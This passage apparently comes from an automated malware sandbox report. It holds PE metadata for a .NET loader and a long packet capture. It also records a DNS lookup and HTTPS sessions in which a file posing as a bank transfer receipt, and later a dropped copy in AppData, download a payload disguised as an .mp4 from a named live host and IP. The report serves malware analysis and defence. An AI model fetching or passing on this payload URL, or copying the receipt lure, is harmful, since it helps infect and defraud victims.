                                      .reloc | 0x202000 | 0xc | 0x200 | 7f3cde3100bb7246f83f54ea560d4bbd | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                      RT_VERSION | 0x2000a0 | 0x32c | data | | | 0.4211822660098522
                                      RT_MANIFEST | 0x2003cc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                      DLL | Import
                                      mscoree.dll | _CorExeMain
                                      Description | Data
                                      Translation | 0x0000 0x04b0
                                      Comments |
                                      CompanyName |
                                      FileDescription | Dnkebcxona
                                      FileVersion | 1.0.0.0
                                      InternalName | Dnkebcxona.exe
                                      LegalCopyright | Copyright 2011
                                      LegalTrademarks |
                                      OriginalFilename | Dnkebcxona.exe
                                      ProductName | Dnkebcxona
                                      ProductVersion | 1.0.0.0
                                      Assembly Version | 1.0.0.0
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Feb 19, 2025 08:56:57.644583941 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.644633055 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.644692898 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.673871994 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.673964977 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.674236059 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.674299002 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.674695015 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.674762964 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.674969912 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.675035000 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.675406933 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.675476074 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.675854921 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.675904989 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.675915956 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.675930977 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.675947905 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.675968885 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.676604033 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.676675081 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.677057981 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.677104950 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.677125931 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.677131891 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.677155018 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.677175999 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.678006887 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.678051949 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.678071976 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.678078890 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.678097010 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.678114891 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.680574894 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.680668116 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.735059023 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.735141039 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.735471010 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.735532999 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.764599085 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.764662981 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.765266895 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.765321016 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.765597105 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.765645027 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.765894890 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.765950918 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.766458988 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.766604900 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.766911983 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.766959906 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.766992092 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.767035961 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.767867088 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.767911911 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.767923117 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.767932892 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.767961979 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.767978907 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.768570900 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.768619061 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.768623114 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.768629074 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.768665075 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.769498110 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.769539118 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.769568920 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.769576073 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.769623995 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.777070045 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.777137041 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.825911999 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.826023102 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.826067924 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.826123953 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.855385065 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.855520010 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.855540037 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.855559111 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.855570078 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.855592966 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.856065035 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.856122017 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.859344959 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.859443903 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.859617949 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.859675884 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.859831095 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.859889030 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.859997034 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.860054016 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.860202074 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.860263109 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.860431910 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.860506058 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.860569954 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.860647917 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.860685110 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.860749960 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.860793114 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.860852957 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.861351013 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.861414909 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.861463070 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.861526012 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.868891001 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.869025946 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.917512894 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.917637110 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.917824984 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.917893887 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.947195053 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.947324038 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.947643995 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.947727919 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.947837114 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.947900057 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.948160887 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.948225975 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.948822975 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.948892117 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.949145079 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.949197054 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.949208021 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.949223995 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.949248075 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.949274063 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.950037003 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.950107098 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.950221062 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.950283051 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.950331926 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.950392008 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.950896025 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.950939894 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.950954914 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.950963974 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.950988054 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.951010942 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.951477051 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.951534033 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:57.959568024 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:57.959664106 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.008292913 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.008378983 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.008619070 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.008677959 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.037982941 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.038065910 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.038252115 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.038316965 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.038615942 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.038671970 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.038800955 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.038850069 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.039459944 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.039516926 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.039714098 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.039773941 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.040045023 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.040076971 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.040103912 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.040115118 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.040128946 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.040154934 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.040843964 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.040936947 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.041429996 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.041510105 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.041786909 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.041836977 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.041857004 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.041862965 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.041874886 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.041894913 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.041903019 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.041907072 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.041935921 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.041959047 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.049916029 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.049988985 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.098355055 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.098433971 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.098613977 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.098670006 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.098759890 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.098814964 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.128397942 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.128494978 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.128566980 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.128632069 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.128990889 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.129062891 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.129339933 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.129411936 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.129736900 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.129805088 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.129945040 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.130011082 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.130449057 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.130513906 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.130642891 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.130697012 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.130944014 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.131007910 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.131494999 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.131567001 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.131578922 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.131598949 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.131633043 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.131654978 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.132153034 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.132188082 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.132203102 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.132215977 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.132256031 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.132348061 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.140619040 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.140676022 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.140702963 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.140716076 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.140738010 CET44349704204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:56:58.140760899 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.140780926 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:56:58.146205902 CET49704443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:09.622643948 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:09.622698069 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:09.622940063 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:09.628690004 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:09.628703117 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.219707012 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.219990015 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:10.223984003 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:10.224001884 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.224323034 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.271332026 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:10.291280031 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:10.331331968 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.457463026 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.457493067 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.457500935 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.457583904 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:10.457600117 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.505665064 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:10.522979021 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.522989035 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.523031950 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.523144960 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:10.523144960 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:10.561913013 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.561925888 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.562043905 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:10.562825918 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.562834024 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.562899113 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:10.564450026 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.564456940 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.564713955 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:10.609947920 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.609961987 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.610080004 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:10.648870945 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:10.649080992 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:10.649904013 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.449388027 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.449553013 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.449690104 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.450026035 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.450093031 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.450158119 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.450166941 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.450172901 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.450220108 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.450220108 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.450371027 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.450537920 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.450615883 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.450690985 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.450933933 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.451176882 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.451185942 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.451200962 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.451241970 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.451242924 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.451241970 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.451261044 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.451333046 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.451894999 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.451939106 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.451982975 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.451982975 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.451997042 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.452653885 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.455919027 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.456104040 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.475183010 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.475296021 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.499270916 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.499429941 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.499562025 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.499690056 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.499722958 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.499811888 CET44349705204.44.192.90192.168.2.5
                                      Feb 19, 2025 08:57:11.499835968 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.499986887 CET49705443192.168.2.5204.44.192.90
                                      Feb 19, 2025 08:57:11.502528906 CET49705443192.168.2.5204.44.192.90
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Feb 19, 2025 08:56:55.735028028 CET | 55370 | 53 | 192.168.2.5 | 1.1.1.1
                                      Feb 19, 2025 08:56:55.977088928 CET | 53 | 55370 | 1.1.1.1 | 192.168.2.5

                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Feb 19, 2025 08:56:55.735028028 CET | 192.168.2.5 | 1.1.1.1 | 0xbc37 | Standard query (0) | alcomax.com.co | A (IP address) | IN (0x0001) | false

                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Feb 19, 2025 08:56:55.977088928 CET | 1.1.1.1 | 192.168.2.5 | 0xbc37 | No error (0) | alcomax.com.co | | 204.44.192.90 | A (IP address) | IN (0x0001) | false
                                      • alcomax.com.co
                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.2.5 | 49704 | 204.44.192.90 | 443 | 4956 | C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe

                                      Timestamp | Bytes transferred | Direction | Data
                                      2025-02-19 07:56:56 UTC | 78 | OUT | GET /Ilmseyropc.mp4 HTTP/1.1
                                      Host: alcomax.com.co
                                      Connection: Keep-Alive
                                      2025-02-19 07:56:56 UTC | 269 | IN | HTTP/1.1 200 OK
                                      Date: Wed, 19 Feb 2025 07:56:56 GMT
                                      Server: Apache
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Last-Modified: Tue, 18 Feb 2025 18:42:11 GMT
                                      Accept-Ranges: bytes
                                      Content-Length: 1249800
                                      Vary: Accept-Encoding,User-Agent
                                      Content-Type: video/mp4


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      1 | 192.168.2.5 | 49705 | 204.44.192.90 | 443 | 7120 | C:\Users\user\AppData\Roaming\IsClosed.exe

                                      Timestamp | Bytes transferred | Direction | Data
                                      2025-02-19 07:57:10 UTC | 78 | OUT | GET /Ilmseyropc.mp4 HTTP/1.1
                                      Host: alcomax.com.co
                                      Connection: Keep-Alive
                                      2025-02-19 07:57:10 UTC | 269 | IN | HTTP/1.1 200 OK
                                      Date: Wed, 19 Feb 2025 07:57:09 GMT
                                      Server: Apache
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Last-Modified: Tue, 18 Feb 2025 18:42:11 GMT
                                      Accept-Ranges: bytes
                                      Content-Length: 1249800
